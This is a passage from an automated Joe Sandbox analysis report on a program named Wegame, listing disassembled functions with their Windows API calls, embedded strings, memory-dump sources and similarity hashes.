                                                                  • Part of subcall function 0046172D: wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(5664TPF_Share_Mem,00000020,TPF_Share_Mem,5664TPF_Share_Mem,00000020,%lu,00000000,5664TPF_Share_Mem,00000000,00000040,?,?,004586E8,00000004,00401D82), ref: 0046175C
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000004,00000000,00000004,00401D82), ref: 004586F3
                                                                • GetLastError.KERNEL32 ref: 00458700
                                                                  • Part of subcall function 0046DCAC: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 0046DCB5
                                                                  • Part of subcall function 0046DCAC: __vfprintf_l.MSPDB140-MSVCRT ref: 0046DCC3
                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000004), ref: 00458724
                                                                • GetLastError.KERNEL32 ref: 00458731
                                                                Strings
                                                                • Could not map view of file (%lu)., xrefs: 00458738
                                                                • Could not open file mapping object (%lu)., xrefs: 00458707
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLast$CreateCurrentH_prolog3MappingProcessView__acrt_iob_func__vfprintf_lmemsetwcscat_s
                                                                • String ID: Could not map view of file (%lu).$Could not open file mapping object (%lu).
                                                                • API String ID: 3062832350-3732869390
                                                                • Opcode ID: ca6ca838f2df83af09f003f5db80a0ad3607a904297816f43d2637395ad02301
                                                                • Instruction ID: 8ead46b84f9dc2e3b77945274bd34c171f9c41072d053b9dabd5d534c4295b43
                                                                • Opcode Fuzzy Hash: ca6ca838f2df83af09f003f5db80a0ad3607a904297816f43d2637395ad02301
                                                                • Instruction Fuzzy Hash: 362193B1A00701DED7206F269C09E16BAE4EF94714B20812FF559DB2A2EFB4C440CB1E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD4702B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD47035
                                                                • ?split_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@1@Z.COMMON(?,?,?), ref: 6BD4709A
                                                                  • Part of subcall function 6BD4961C: __EH_prolog3_GS.LIBCMT ref: 6BD49623
                                                                • ?get_file_path_by_key@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD470F7
                                                                  • Part of subcall function 6BD4733B: __EH_prolog3_catch_GS.LIBCMT ref: 6BD47342
                                                                  • Part of subcall function 6BD4733B: ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N3@Z.COMMON(?,?,?,00000001,?,0000006C,6BD47125,?,?,?,?), ref: 6BD47365
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 6BD47188
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD4718F
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6BD471B3
                                                                • [cfg_mgr]get_cfg failed, path:%s, node_name:%s, xrefs: 6BD471E2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$H_prolog3_catch_$?get_cfg@common@ierd_tgp@@?get_file_path_by_key@common@ierd_tgp@@?get_log_instance@base@@?split_path@common@ierd_tgp@@?u16to8@common@ierd_tgp@@D@2@@4@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3_Logger@1@U?$char_traits@_U?$less@V12@V34@1@V?$allocator@_V?$basic_ptree@V?$basic_string@_Vpath@filesystem@2@Vpath@filesystem@2@@W@2@@std@@W@std@@_invalid_parameter_noinfo_noreturn
                                                                • String ID: [cfg_mgr]get_cfg failed, path:%s, node_name:%s$e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file.cpp
                                                                • API String ID: 868211161-939106724
                                                                • Opcode ID: c5ef1e3ad510cfca272a45a84982a1d1f02c6a86edb4421fb0f62aa1a11fdaef
                                                                • Instruction ID: 7d66c89d8793df921b37c95c111b2f22ac6c072d5c0379b49f0e4c0fd748634a
                                                                • Opcode Fuzzy Hash: c5ef1e3ad510cfca272a45a84982a1d1f02c6a86edb4421fb0f62aa1a11fdaef
                                                                • Instruction Fuzzy Hash: 93616B70C06288EADF15CFF8C995BCDBBB4AF25318F64819DC044AB281DB795B09CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BF6FE20 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124stringnetworkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • strchr.VCRUNTIME140(?,0000003A,00000000,00000000,?,?), ref: 6BF6FE59
                                                                • memmove.VCRUNTIME140(?,?,00000000,?,?), ref: 6BF6FE7E
                                                                • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(-00000001), ref: 6BF6FE9D
                                                                • htons.WS2_32(00000000), ref: 6BF6FED7
                                                                • strspn.API-MS-WIN-CRT-STRING-L1-1-0(?,1234567890.), ref: 6BF6FEEB
                                                                • gethostbyname.WS2_32(?), ref: 6BF6FF43
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: atoigethostbynamehtonsmemmovestrchrstrspn
                                                                • String ID: 1234567890.
                                                                • API String ID: 532542645-3734169883
                                                                • Opcode ID: de4be6df10ec1a983a35c4e64970cfd39d4344e1cf8affce8ce587f8b3c70dfc
                                                                • Instruction ID: c2669e5e8e3428d919e393e606b4f09ef46207389cd28ba83d37c9941751a829
                                                                • Opcode Fuzzy Hash: de4be6df10ec1a983a35c4e64970cfd39d4344e1cf8affce8ce587f8b3c70dfc
                                                                • Instruction Fuzzy Hash: F2312677A043459BDB50CF34D940BAA77E8BF57344F008A6DED8987221FB3AD50A8751
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043E851 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 59threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0043E858
                                                                • ?StartThread@CThread@@QAEHPAXH@Z.COMMON(00000000,00000000,00000050), ref: 0043E861
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000000,00000050), ref: 0043E86A
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000000,00000050), ref: 0043E8A9
                                                                Strings
                                                                • Start crash check thread success., xrefs: 0043E8A2
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp, xrefs: 0043E88F, 0043E8CA
                                                                • Start crash check thread FAIL., xrefs: 0043E8E1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$H_prolog3H_prolog3_StartThread@Thread@@
                                                                • String ID: Start crash check thread FAIL.$Start crash check thread success.$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp
                                                                • API String ID: 2209094223-3309645343
                                                                • Opcode ID: b88d54ed209928386e363797d2c4ee566b78ee6adbdcdf05c16c5ac3ee981850
                                                                • Instruction ID: 465282a7c89290b7f96fccd01b8d146bc71a8d66bffd407c2e6cc9706683e32c
                                                                • Opcode Fuzzy Hash: b88d54ed209928386e363797d2c4ee566b78ee6adbdcdf05c16c5ac3ee981850
                                                                • Instruction Fuzzy Hash: 5C112570F41710A6CB25BB639C52FAF26208F95B08F21800BB8113B3C6DF6D9E02C68D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDCD992 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDCD999
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON(0000001C,6BD5A6E4,?,?,?,?,?,?,?,00000000,00000009), ref: 6BDCD9AE
                                                                • ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,0000001C,6BD5A6E4,?,?,?,?,?,?,?,00000000,00000009), ref: 6BDCD9B7
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(?,0000001C,6BD5A6E4,?,?,?,?,?,?,?,00000000,00000009), ref: 6BDCD9CA
                                                                • GetPrivateProfileIntW.KERNEL32(curl_certificate_info,is_certificate_open,00000000,?), ref: 6BDCD9E7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Application@common@ierd_tgp@@$??_0path@filesystem@ierd_tgp@@?get_workingdir_path_ex@?instance@H_prolog3_PrivateProfileV012@V123@Vpath@filesystem@3@
                                                                • String ID: curl_certificate_info$is_certificate_open
                                                                • API String ID: 4076247625-1679244404
                                                                • Opcode ID: 81150c6cb1cb16cb1a3f6a14d2691fe145f45fb2c26e71b86065b236af957c94
                                                                • Instruction ID: 503bc32f1cc03b8f36475f28c2e729a22c46ff6b34510d3a84abd035f70b3f51
                                                                • Opcode Fuzzy Hash: 81150c6cb1cb16cb1a3f6a14d2691fe145f45fb2c26e71b86065b236af957c94
                                                                • Instruction Fuzzy Hash: FDF0A436994184DADF14DFB4C805BDCBFB4BB26229F641058C1A0AA0A0CB3C8648D733
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD2EA2F Relevance: 12.3, APIs: 8, Instructions: 283COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2EA39
                                                                  • Part of subcall function 6BD2E537: __EH_prolog3.LIBCMT ref: 6BD2E53E
                                                                  • Part of subcall function 6BD1820A: __EH_prolog3.LIBCMT ref: 6BD18211
                                                                  • Part of subcall function 6BD1820A: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,6BD2EA59,00000000,?,000000C4,6BD2A828,00000000,00000008,00000009,00000003,00000024,6BDBA75E,create_directory_ex fail, error code:%1%, path:%2%), ref: 6BD1821C
                                                                  • Part of subcall function 6BD1820A: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD18233
                                                                  • Part of subcall function 6BD1820A: std::locale::_Getfacet.LIBCPMT ref: 6BD1823D
                                                                  • Part of subcall function 6BD1820A: ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,00000008,00000000), ref: 6BD18256
                                                                  • Part of subcall function 6BD1820A: std::_Facet_Register.LIBCPMT ref: 6BD1826E
                                                                  • Part of subcall function 6BD1820A: ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD18291
                                                                • ?widen@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000025,?,000000C4,6BD2A828,00000000,00000008,00000009,00000003,00000024,6BDBA75E,create_directory_ex fail, error code:%1%, path:%2%), ref: 6BD2EA75
                                                                  • Part of subcall function 6BD2A623: __EH_prolog3.LIBCMT ref: 6BD2A62A
                                                                  • Part of subcall function 6BD2E69D: __EH_prolog3_GS.LIBCMT ref: 6BD2E6A7
                                                                  • Part of subcall function 6BD2E69D: ?widen@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000020,?,00000088,6BD2EAB6,00000000), ref: 6BD2E6CA
                                                                • ?widen@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000020), ref: 6BD2ED0D
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,00000008,?,00000000,?,00000000), ref: 6BD2ED98
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,00000000,?,00000000), ref: 6BD2EDAA
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,00000000,?,00000000), ref: 6BD2EDC5
                                                                • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(000000FF,?,00000000,?,00000000), ref: 6BD2EDD4
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,00000000,?,00000000), ref: 6BD2EDE1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@D@std@@$?widen@?$ctype@H_prolog3$H_prolog3_Lockit@std@@$??0_??1_?gbump@?$basic_streambuf@Bid@locale@std@@Facet_Getcat@?$ctype@GetfacetRegisterV42@@Vfacet@locale@2@std::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 2851808594-0
                                                                • Opcode ID: 66ae3af4bac3b09527487ac287c4726b2e01897328d985ca9958169fd0e37262
                                                                • Instruction ID: 9c5a8ae7bb9b0077e9824095e02889f2ff5be5c376b6b817be9b9e93060ecde1
                                                                • Opcode Fuzzy Hash: 66ae3af4bac3b09527487ac287c4726b2e01897328d985ca9958169fd0e37262
                                                                • Instruction Fuzzy Hash: 20B1A374A102A4CFDB24CF38CC84BA9B7B6AF46328F1042D9D65D9B291DB349E85DF11
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD572D2 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 517threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 6BD572D5
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD57A84
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 6BD57AD3
                                                                  • Part of subcall function 6BDAB9D8: __EH_prolog3_GS.LIBCMT ref: 6BDAB9DF
                                                                  • Part of subcall function 6BD1CEF4: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6BD1A734,?,00000004,6BD1A09E,?,1F5A0D44), ref: 6BD1CF53
                                                                • ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@Z.COMMON(?,?,?,?), ref: 6BD57B22
                                                                  • Part of subcall function 6BD46FC9: ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N3@Z.COMMON(?,?,?,00000001,00000000,?,6BD475CC,?,00000000,?,files,00000005), ref: 6BD46FD9
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                  • Part of subcall function 6BD45176: __EH_prolog3.LIBCMT ref: 6BD4517D
                                                                  • Part of subcall function 6BD474AD: __EH_prolog3_GS.LIBCMT ref: 6BD474B4
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                  • Part of subcall function 6BD56D1F: __EH_prolog3_GS.LIBCMT ref: 6BD56D29
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$H_prolog3_$?get_cfg@common@ierd_tgp@@H_prolog3U?$less@V12@V?$basic_ptree@Vpath@filesystem@2@memmove$?u8to16@common@ierd_tgp@@CurrentD@2@@std@@@2@@property_tree@boost@@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3_catch_ThreadU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@4@@W@std@@_invalid_parameter_noinfo_noreturn
                                                                • String ID: .lazy$plugins
                                                                • API String ID: 3626403630-1263553738
                                                                • Opcode ID: 90a8ab78a84fc9d0e940eebf0cdcc0eb446530048ba1098f1a643b10dc9c18da
                                                                • Instruction ID: cd235a0053cbf51005e6142f208ea341ab96a93e00ee6368f64b9765cc3c232b
                                                                • Opcode Fuzzy Hash: 90a8ab78a84fc9d0e940eebf0cdcc0eb446530048ba1098f1a643b10dc9c18da
                                                                • Instruction Fuzzy Hash: 47428EB2C1229CDADB15CFA4C9447DDBBB4AF21318F6080ED95186B281DB781F88DF65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD83DDA Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD83DE4
                                                                  • Part of subcall function 6BD83D5C: __EH_prolog3_GS.LIBCMT ref: 6BD83D63
                                                                  • Part of subcall function 6BD83D5C: memmove.VCRUNTIME140(?,?,00000010,?,00000018,6BD83E28,?,00000010), ref: 6BD83D9E
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD83E2E
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                • memset.VCRUNTIME140(?,00000000,00000040), ref: 6BD83EA7
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\machine_guid.cpp, xrefs: 6BD83E4F
                                                                • get_qm_report_guid failed, xrefs: 6BD83E66
                                                                • %02x, xrefs: 6BD83EBA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$?get_log_instance@base@@H_prolog3H_prolog3_catch_Logger@1@memmovememset
                                                                • String ID: %02x$e:\dailybuild_dev\wegame_client\codes\common\src\machine_guid.cpp$get_qm_report_guid failed
                                                                • API String ID: 1511065185-4286905754
                                                                • Opcode ID: 93e5cde73b81094747e17837025d3a74941b38b032185fb4bdd999caf645cfec
                                                                • Instruction ID: 54a1d6bac014d4ba3ee016142dbfaecc85b332ec96e73831b941c2f7afb8b0e0
                                                                • Opcode Fuzzy Hash: 93e5cde73b81094747e17837025d3a74941b38b032185fb4bdd999caf645cfec
                                                                • Instruction Fuzzy Hash: D641F571904308AAEB25CFB8CC91BDDBB75FF14318F10019DD4096F292EB799A49CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD9AFD1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B012
